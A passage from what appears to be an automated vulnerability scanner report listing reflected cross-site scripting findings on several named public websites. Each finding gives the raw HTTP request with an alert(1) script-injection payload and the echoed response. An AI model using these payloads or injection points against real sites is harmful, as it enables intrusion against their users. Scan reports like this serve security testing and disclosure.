HTTP/1.1 404
Cache-Control: private
Content-Length: 30033
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: PORTAL=PARTNER=Beyond%2Ecom&NEWUSERSITE=&DIDIPLKUP=Y&USERSTATE=TEXAS&HTTPREFERRER=&USERGID=913263227153426286&USERCOUNTRY=US; expires=Sun, 01-Apr-2012 04:00:00 GMT; path=/
Set-Cookie: Visitor=NewSessionID=7A3FD486%2D48A5%2D4EA0%2DB271%2D6C91FED7EA92; path=/
Set-Cookie: ASPSESSIONIDAQTRQBAR=KNFHENGDPLLKNBNCIIEGPDBD; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:03:54 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equ
...[SNIP]...
6124&r_partnersitename=Beyond.com&t_pgid=446235606103476794&t_sn=/common/error/checkurl.asp&t_httph=www.beyond.com&t_httpurl=/common/error/checkurl.asp&t_httpqs=404;http://www.beyond.com:80/favicon.icoe5463 style=x:expression(alert(1)) fd7a74860e&t_sgid=465502406305451416&t_ws=COLO-WEB01&t_ugid=913263227153426286&f_ip=173.193.214.243&ud=>
...[SNIP]...

6.15. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cd89"><script>alert(1)</script>b47e0ff56e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico9cd89"><script>alert(1)</script>b47e0ff56e9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biblegateway.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:35:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: bg_id=00ab965157d8537e82c701009fe51263; path=/; domain=.biblegateway.com
Content-Length: 18832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BibleGateway.com - W
...[SNIP]...
<input type="text" size="40" name="request" value="http://www.biblegateway.com/favicon.ico9cd89"><script>alert(1)</script>b47e0ff56e9" />
...[SNIP]...

6.16. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e6b8e--><script>alert(1)</script>f5a7c98118a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe6b8e--><script>alert(1)</script>f5a7c98118a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biblegateway.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:35:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: bg_id=1183588a8508212bca1abb89a6cb2a8d; path=/; domain=.biblegateway.com
Content-Length: 18834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BibleGateway.com - W
...[SNIP]...
<input type="text" size="40" name="request" value="/favicon.icoe6b8e--><script>alert(1)</script>f5a7c98118a" />
...[SNIP]...

6.17. http://www.blackplanet.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackplanet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f3c8"><script>alert(1)</script>54790336890 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3f3c8"><script>alert(1)</script>54790336890 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackplanet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:00:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.4
Edge-control: no-store
Page-Name: /3f3c8"><script>alert(1)</script>54790336890
Set-Cookie: user_guid=d41d8cd98f00b204e9800998ecf8427e.4d972bf5ab15e4.37665058; path=/
Cache-Control: no-cache, no-store, private
Content-Type: text/html; charset=utf-8
Content-Length: 77942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<base href="http://www.blackplanet.com/3f3c8"><script>alert(1)</script>54790336890" />
...[SNIP]...

6.18. http://www.blurtit.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blurtit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6f4c'-alert(1)-'19aa576003b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob6f4c'-alert(1)-'19aa576003b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blurtit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:27:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By:
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:27:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: PHPSESSID=gj6oi7nrchu34cjuu1pvhmt7g1; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
hEngine(
           "http://www.blurtit.com/inc/"+name+".src",
           "http://www.blurtit.com/inc/"+name+"."+ext,
           name,cat);
       
   }
   else{
       errorMsg(name,ext,cat);
   }
}
var currentPage = '/favicon.icob6f4c'-alert(1)-'19aa576003b';
//-->
...[SNIP]...

6.19. http://www.blurtit.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blurtit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e95"><script>alert(1)</script>0dbcb03d99f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico27e95"><script>alert(1)</script>0dbcb03d99f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blurtit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:27:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By:
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:27:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: PHPSESSID=3fuii4e2ro74fkn0ag29lot583; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="large_modal" script="/zone.php" return="/favicon.ico27e95"><script>alert(1)</script>0dbcb03d99f" resource="">
...[SNIP]...

6.20. http://www.booking.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31d83"><script>alert(1)</script>f038581b329 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico31d83"><script>alert(1)</script>f038581b329 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.booking.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:46 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from www.booking.com
Content-Length: 38617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                                                                                                                               
...[SNIP]...
<meta property="og:url" content="http://www.booking.com/favicon.ico31d83"><script>alert(1)</script>f038581b329" />
...[SNIP]...

6.21. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c2b1<script>alert(1)</script>d7b417a0868 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /7c2b1<script>alert(1)</script>d7b417a0868 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:03:46 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: lapg=%2F7c2b1%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed7b417a0868%3FN%3D0%26D%3Dx%26Ntt%3D7c2b1%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed7b417a0868%26top%3Dyes; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: bzid=1301753026034; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: JSESSIONID=C8D8B00D722639114CC9D968B79ED1FF.vision1portal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25260

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<span style="color: #74B74A);" class="bz-emphasize">"7c2b1<script>alert(1)</script>d7b417a0868"</span>
...[SNIP]...

6.22. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d827'%3balert(1)//f900ae9d4e1 was submitted in the REST URL parameter 1. This input was echoed as 3d827';alert(1)//f900ae9d4e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3d827'%3balert(1)//f900ae9d4e1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:03:45 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: lapg=%2F3d827%27%3FN%3D0%26D%3Dx%26Ntt%3D3d827%27%3Balert%281%29%2F%2Ff900ae9d4e1%26top%3Dyes; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: bzid=1301753025507; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: JSESSIONID=C0D0FFA84BA2B8122526460BFC309C71.fury1portal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28216

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<script>bZ.events.handlers.zeroResults('3d827';alert(1)//f900ae9d4e1');</script>
...[SNIP]...

6.23. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 8110a</title><script>alert(1)</script>09446e4c092 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8110a</title><script>alert(1)</script>09446e4c092 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:03:46 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: lapg=%2F8110a%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E09446e4c092%3FN%3D0%26D%3Dx%26Ntt%3D8110a%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E09446e4c092%26top%3Dyes; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: bzid=1301753026723; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: JSESSIONID=985D75A4878160C26E5AC58466A0042F.fury1portal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28575

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<title>Buzzillions.com - Search for &#8220;8110a</title><script>alert(1)</script>09446e4c092&#8221;</title>
...[SNIP]...

6.24. http://www.caringbridge.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caringbridge.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e0af"><script>alert(1)</script>e4e99b75a76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4e0af"><script>alert(1)</script>e4e99b75a76 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.caringbridge.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:45:06 GMT
Server: Apache
Set-Cookie: lang=en; path=/
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:45:06 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 9848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Page You Requested Was N
...[SNIP]...
<a href="/favicon.ico4e0af"><script>alert(1)</script>e4e99b75a76/es">
...[SNIP]...

6.25. http://www.cliffsnotes.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cliffsnotes.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 13a1d<script>alert(1)</script>c642b5d4bda was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico13a1d<script>alert(1)</script>c642b5d4bda HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cliffsnotes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 14:09:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1D6D0BAF1D692C9DD311319A3C3F0A3B; Path=/
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<i>/WileyCDA//favicon.ico13a1d<script>alert(1)</script>c642b5d4bda</i>
...[SNIP]...

6.26. http://www.colbertnation.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colbertnation.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8cf7"><script>alert(1)</script>c187a66e885 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc8cf7"><script>alert(1)</script>c187a66e885 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.colbertnation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.1
X-Powered-By: PHP/5.3.1
Accept-ESI: 1.0
Content-Type: text/html
Content-Length: 24243
Cache-Control: max-age=3593
Date: Sat, 02 Apr 2011 14:19:11 GMT
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <he
...[SNIP]...
<link rel="canonical" href="http://www.colbertnation.com/favicon.icoc8cf7"><script>alert(1)</script>c187a66e885" />
...[SNIP]...

6.27. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f7f8"-alert(1)-"6131f1d2df4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico1f7f8"-alert(1)-"6131f1d2df4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:38:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:38:04 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:38:05 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:38:04 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bfd7f48759b88f74f115a942a0192cab528325b5; expires=Fri, 01-Apr-2016 18:41:55 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bfd7f48759b88f74f115a942a0192cab528325b5; expires=Fri, 01-Apr-2016 18:41:55 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
"5480.iac.collegehumor";
jument.cookie.domain = ".collegehumor.com";
jument.home_url = "http://www.collegehumor.com";
jument.this_url = "http://www.collegehumor.com/favicon.ico1f7f8"-alert(1)-"6131f1d2df4";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/favicon.ico1f7f8"-alert(1
...[SNIP]...

6.28. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 884c7'-alert(1)-'3ff612d36a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico884c7'-alert(1)-'3ff612d36a6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:38:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:38:06 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:38:07 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:38:06 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bd254816c761ff323b0d89497568c5a23e743eab; expires=Fri, 01-Apr-2016 18:41:57 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bd254816c761ff323b0d89497568c5a23e743eab; expires=Fri, 01-Apr-2016 18:41:57 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
)-'3ff612d36a6";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/favicon.ico884c7'-alert(1)-'3ff612d36a6';
ch.this_url_64 = 'aHR0cDovL3d3dy5jb2xsZWdlaHVtb3IuY29tL2Zhdmljb24uaWNvODg0YzcnLWFsZXJ0KDEpLSczZmY2MTJkMzZhNg==';
ch.home_url = 'http://www.collegehumor.com';
ch.user_id = 0;

...[SNIP]...

6.29. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0e55"-alert(1)-"d509def4047 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?f0e55"-alert(1)-"d509def4047=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:37:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:37:14 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:37:15 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:37:14 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=43262f6ac8638772c644f10a51cc6ea9b97bea3c; expires=Fri, 01-Apr-2016 18:41:05 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=43262f6ac8638772c644f10a51cc6ea9b97bea3c; expires=Fri, 01-Apr-2016 18:41:05 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
"5480.iac.collegehumor";
jument.cookie.domain = ".collegehumor.com";
jument.home_url = "http://www.collegehumor.com";
jument.this_url = "http://www.collegehumor.com/favicon.ico?f0e55"-alert(1)-"d509def4047=1";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/favicon.ico?f0e55"-aler
...[SNIP]...

6.30. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1307'-alert(1)-'314d4297df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?e1307'-alert(1)-'314d4297df=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:37:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:37:17 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:37:18 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:37:17 GMT; path=/; domain=.collegehumor.com
